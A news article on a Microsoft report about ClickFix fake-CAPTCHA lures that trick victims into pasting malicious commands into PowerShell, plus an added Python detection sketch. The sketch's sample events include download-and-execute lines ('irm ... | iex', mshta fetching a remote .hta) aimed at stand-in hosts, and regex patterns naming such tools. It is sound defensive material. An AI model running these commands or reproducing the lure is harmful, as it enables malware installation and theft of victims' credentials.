Microsoft Details ClickFix Malware Scam That Dupes Victims With Fake CAPTCHAs

As was shown in a recent report about a vicious cyber attack that targeted kidney failure patients, cyber criminals show no mercy. Now a new report from Microsoft has revealed a growing deployment of ClickFix social engineering tactics by threat actors worldwide, which dupe victims through fake CAPTCHAs.

ClickFix is a social engineering tactic often deployed by bad actors who skillfully lure victims into instructing their computers to run malicious programs. The first thing hackers typically do in these attacks is to trick a victim into visiting their page, which is often a clone of a real company or popular organization's website. Microsoft observed this in a case where threat actors sent a malicious email to a target, which was used to lure the target to the fake site. From there, victims are redirected to a page that makes them feel they've encountered an issue they can fix easily.


In most cases, the solution to the issue is presented as a quick Google reCAPTCHA challenge, a technique that has been widely used in recent attacks. In contrast, previous ClickFix attacks used "Google's 'Aw, Snap!' crash error." Users are then presented with a deceptive prompt, which they are encouraged to click. It might just be a "verify you are human" checkbox.

Taking this step silently copies malicious commands to the victim's clipboard. Most of these commands are designed to target macOS and Windows. Once a user has been led this far, the attackers simply manipulate the victim into pasting the command from the clipboard into an environment like the Windows Terminal or PowerShell. Executing these commands downloads malware such as the Lumma infostealer, which can then be used for illegal activities like stealing banking credentials or exfiltrating personal information.
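The chain above (lure page, clipboard, paste into PowerShell, download-and-run) leaves a recognizable footprint in process-creation telemetry. The following detection sketch is an added example, not code from Microsoft or from the report, and it is offline and self-contained: the sample events are constructed (the `example.invalid` hostnames and the Sysmon-style `Image`/`ParentImage`/`CommandLine` field names are assumptions about the log format, not values from the article). The heuristics it scores are also assumptions drawn from the mechanism described, not from the report: a shell or script host spawned from an interactive shell such as `explorer.exe`, a download-and-execute primitive on the command line, window-hiding or policy-bypass switches, and "not a robot"/CAPTCHA wording pasted along with the command.

```python
import ntpath
import re

# Constructed sample process-creation events (not real telemetry). Field names
# follow a Sysmon/EDR-style record; hostnames are deliberately non-routable.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "irm https://lure.example.invalid/v | iex" '
                    '# I am not a robot - reCAPTCHA Verification ID: 1234'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://lure.example.invalid/verify.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},   # benign admin script
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd /c "dir C:\Users"'},                     # benign interactive use
]

# Parents that indicate a human pasted/typed the command (assumed list).
INTERACTIVE_SHELL_PARENTS = {"explorer.exe"}

# (indicator name, weight, pattern applied to the command line). Weights are
# illustrative; tune them against your own baseline before alerting on them.
INDICATORS = [
    ("download_and_execute", 2, re.compile(
        r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest"
        r"|downloadstring|curl)\b|mshta\s+https?://", re.I)),
    ("evasion_switches", 1, re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass"
        r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("captcha_lure_text", 2, re.compile(r"not a robot|captcha|verif", re.I)),
]


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    cmd = event.get("CommandLine", "")
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent in INTERACTIVE_SHELL_PARENTS:
        score += 1
        reasons.append("launched_from_interactive_shell")
    for name, weight, pattern in INDICATORS:
        if pattern.search(cmd):
            score += weight
            reasons.append(name)
    return score, reasons


def triage(events, threshold=3):
    """Return events scoring at or above threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({
                "image": ntpath.basename(ev.get("Image", "")),
                "score": score,
                "reasons": reasons,
                "command_line": ev.get("CommandLine", ""),
            })
    return sorted(hits, key=lambda h: h["score"], reverse=True)


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[{hit['score']}] {hit['image']}: {', '.join(hit['reasons'])}")
        print(f"    {hit['command_line']}")
```

Run on the constructed events, the two lure-style launches are flagged (the PowerShell one scores 6, the `mshta` one 5) while the scheduled backup script and the plain `dir` from Explorer fall below the threshold. The point of weighting rather than matching a single string is that any one indicator (a hidden window, `explorer.exe` as parent) is common in legitimate use; it is the combination of an interactive launch, a remote fetch piped into execution, and CAPTCHA wording on the same command line that is characteristic of this lure.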

Early in the year, a similar report emerged from HP Wolf Security, which revealed that threat actors infect victims' devices with malware by tricking them into engaging in fake CAPTCHA challenges.


To lessen the likelihood of falling victim to these attacks, Microsoft has recommended that users educate themselves on various social engineering techniques being deployed by hackers in the wild. Microsoft also claims that "Microsoft Defender XDR offers comprehensive coverage for ClickFix attacks by leveraging a range of available technologies across different attack layers."